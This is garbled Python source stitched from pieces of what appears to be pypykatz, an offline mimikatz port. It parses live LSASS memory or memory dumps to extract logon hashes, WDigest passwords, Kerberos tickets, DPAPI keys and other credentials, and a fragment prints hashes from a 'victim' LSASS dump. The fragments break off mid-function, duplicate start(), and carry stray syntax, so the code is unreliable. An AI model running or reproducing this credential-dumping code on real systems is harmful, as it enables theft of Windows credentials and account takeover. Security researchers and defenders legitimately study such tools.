self.logon_sessions[cred.luid].kerberos_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def start(self):
# self.log_basic_info()
self.lsa_decryptor = self.get_lsa()
for cb in (
self.get_logoncreds, self.get_wdigest,
self.get_kerberos, self.get_tspkg, self.get_ssp,
self.get_livessp, self.get_dpapi):
try:
cb()
except Exception as e:
self.logger.exception(e)
)
delete_group.add_argument('-o',
'--outfile',
help='Output ccache file name')
delete_group.add_argument('-i',
'--id',
type=int,
action='append',
help='Ticket ID to delete',
required=True)
parser.add_argument('ccachefile', help='input CCACHE file')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
logging.debug('Opening file %s' % args.ccachefile)
cc = CCACHE.from_file(args.ccachefile)
if args.command == 'list':
table = []
table.append(['id'] + Credential.summary_header())
i = 0
for cred in cc.credentials:
table.append([str(i)] + cred.summary())
i += 1
print() #this line intentionally left blank
print_table(table)
elif args.command == 'del':
#delete
output_filename = os.path.join(
os.path.dirname(os.path.abspath(args.ccachefile)),
from minikerberos.ccache import CCACHE
if __name__ == '__main__':
ccache = CCACHE.from_file(
'../../ktest/victim_lsass_latest.dmp_229c8765.ccache')
print(ccache.get_hashes(all_hashes=True))
class pypykatz:
"""mimikatz offline"""
def __init__(self, reader, sysinfo):
self.reader = reader
self.sysinfo = sysinfo
self.credentials = []
self.architecture = None
self.operating_system = None
self.buildnumber = None
self.lsa_decryptor = None
self.logon_sessions = []
self.orphaned_creds = []
self.kerberos_ccache = CCACHE()
def to_dict(self):
t = {}
t['logon_sessions'] = self.logon_sessions
t['orphaned_creds'] = self.orphaned_creds
return t
def to_json(self):
return json.dumps(self.to_dict())
@staticmethod
def go_live():
reader = LiveReader()
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_minidump_file(filename):
minidump = MinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def parse_memory_dump_rekall(filename, override_timestamp=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_memory_file(filename, override_timestamp)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
@staticmethod
def go_rekall(session, override_timestamp=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_session(session, override_timestamp)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
def get_logoncreds(self):
credman_template = CredmanTemplate.get_template(self.sysinfo)
msv_template = MsvTemplate.get_template(self.sysinfo)
logoncred_decryptor = MsvDecryptor(self.reader, msv_template,
self.lsa_decryptor,
credman_template, self.sysinfo)
logoncred_decryptor.start()
self.logon_sessions = logoncred_decryptor.logon_sessions
def get_lsa(self):
lsa_dec_template = LsaTemplate.get_template(self.sysinfo)
lsa_dec = LsaDecryptor(self.reader, lsa_dec_template, self.sysinfo)
logging.debug(lsa_dec.dump())
return lsa_dec
def get_wdigest(self):
decryptor_template = WdigestTemplate.get_template(self.sysinfo)
decryptor = WdigestDecryptor(self.reader, decryptor_template,
self.lsa_decryptor, self.sysinfo)
decryptor.start()
for cred in decryptor.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].wdigest_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_tspkg(self):
tspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)
tspkg_dec = TspkgDecryptor(self.reader, tspkg_dec_template,
self.lsa_decryptor, self.sysinfo)
tspkg_dec.start()
for cred in tspkg_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].tspkg_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_ssp(self):
dec_template = SspTemplate.get_template(self.sysinfo)
dec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].ssp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_livessp(self):
livessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)
livessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template,
self.lsa_decryptor, self.sysinfo)
livessp_dec.start()
for cred in livessp_dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].livessp_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_dpapi(self):
dec_template = DpapiTemplate.get_template(self.sysinfo)
dec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].dpapi_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def get_kerberos(self):
dec_template = KerberosTemplate.get_template(self.sysinfo)
dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor,
self.sysinfo)
dec.start()
for cred in dec.credentials:
for ticket in cred.tickets:
for fn in ticket.kirbi_data:
self.kerberos_ccache.add_kirbi(
ticket.kirbi_data[fn].native)
if cred.luid in self.logon_sessions:
self.logon_sessions[cred.luid].kerberos_creds.append(cred)
else:
self.orphaned_creds.append(cred)
def start(self):
self.lsa_decryptor = self.get_lsa()
self.get_logoncreds()
self.get_wdigest()
#CHICKEN BITS - UNTESTED!!! DO NOT UNCOMMENT
self.get_kerberos()
self.get_tspkg()
self.get_ssp()
self.get_livessp()
self.get_dpapi()